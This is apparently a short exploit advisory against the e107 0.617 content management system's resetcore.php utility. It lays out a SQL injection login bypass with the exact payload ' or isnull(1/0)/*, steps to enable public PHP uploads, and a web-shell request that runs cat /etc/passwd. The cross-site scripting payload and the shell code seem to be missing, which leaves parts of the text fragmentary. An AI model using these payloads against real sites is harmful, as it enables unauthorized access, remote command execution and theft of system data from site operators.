e107 0.617 stable/ 0.6171 / 0.6172 resetcore.php utility SQL Injection / Login bypass / remote code execution / cross site scripting software: site: http://e107.org/news.php description: "e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development." i) SQL INJECTION move to http://[target]/[path]/e107/e107_files/resetcore.php and login with: user: ' or isnull(1/0)/* password: [nothing] choose to manually edit core values..., so you can edit core items, now we have... ii) XSS: ex., in title core item type: and... iii) remote code execution: modify settings to activate public uploads of .php files upload a file like this: then launch commands: http://[target]/[path]/e107/e107_files/public/cmd.php?cmd=cat%20/etc/passwd this is my poc exploit:
e107 0.617 resetcore.php SQL injection & remote commands execution